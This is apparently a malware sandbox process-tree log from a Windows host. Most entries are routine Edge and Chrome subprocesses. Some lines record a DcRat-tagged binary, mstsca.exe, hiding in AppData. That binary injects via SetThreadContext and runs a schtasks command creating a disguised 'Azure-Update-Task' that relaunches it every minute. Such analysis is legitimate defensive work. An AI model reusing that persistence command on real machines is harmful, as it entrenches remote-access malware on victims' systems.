C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=2588 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6516 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5780 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2596 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6180 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4188 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3908 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5880 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7076 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7064 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6768 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6192 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1336 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,17624560266371677579,4271209812158204646,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2872 /prefetch:82⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x320 0x40c1⤵
-
C:\Users\Admin\Downloads\ProcessExplorer\procexp.exe"C:\Users\Admin\Downloads\ProcessExplorer\procexp.exe"1⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"3⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\Downloads\ProcessExplorer\procexp.exe"C:\Users\Admin\Downloads\ProcessExplorer\procexp.exe"1⤵
-
C:\Users\Admin\Downloads\ProcessExplorer\procexp.exe"C:\Users\Admin\Downloads\ProcessExplorer\procexp.exe"1⤵
-
C:\Users\Admin\Downloads\Autoruns\autorunsc.exe"C:\Users\Admin\Downloads\Autoruns\autorunsc.exe"1⤵
-
C:\Users\Admin\Downloads\Autoruns\Autoruns.exe"C:\Users\Admin\Downloads\Autoruns\Autoruns.exe"1⤵
-
C:\Users\Admin\Downloads\Autoruns\Autoruns.exe"C:\Users\Admin\Downloads\Autoruns\Autoruns.exe"1⤵
-
C:\Users\Admin\Downloads\Autoruns\Autoruns.exe"C:\Users\Admin\Downloads\Autoruns\Autoruns.exe"1⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefaultbd49a038h7b02h4fbeh8601hf6e67bc040da1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc6ba946f8,0x7ffc6ba94708,0x7ffc6ba947182⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,14969305814675071084,3473329563513418291,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,14969305814675071084,3473329563513418291,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1392 /prefetch:32⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Users\Admin\Downloads\Autoruns\Autoruns.exe"C:\Users\Admin\Downloads\Autoruns\Autoruns.exe"1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xfc,0x10c,0x7ffc7af646f8,0x7ffc7af64708,0x7ffc7af647182⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,16045566515509987898,7697870980986531735,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,16045566515509987898,7697870980986531735,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 /prefetch:32⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,16045566515509987898,7697870980986531735,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2876 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,16045566515509987898,7697870980986531735,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,16045566515509987898,7697870980986531735,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2076,16045566515509987898,7697870980986531735,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4376 /prefetch:82⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Users\Admin\Desktop\procexp.exe"C:\Users\Admin\Desktop\procexp.exe"1⤵
-
C:\Users\Admin\Desktop\Autoruns.exe"C:\Users\Admin\Desktop\Autoruns.exe"1⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Users\Admin\Desktop\procexp.exe"C:\Users\Admin\Desktop\procexp.exe"1⤵
-
C:\Users\Admin\Desktop\Autoruns.exe"C:\Users\Admin\Desktop\Autoruns.exe"1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc7af24f50,0x7ffc7af24f60,0x7ffc7af24f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1648 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2012 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2420 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2932 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2920 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4656 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4768 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4896 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5112 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5188 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3136 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3700 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3044 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5160 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3128 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2272 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2712 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5436 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5300 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5248 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1632 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3952 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3872 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3108 /prefetch:12⤵
-
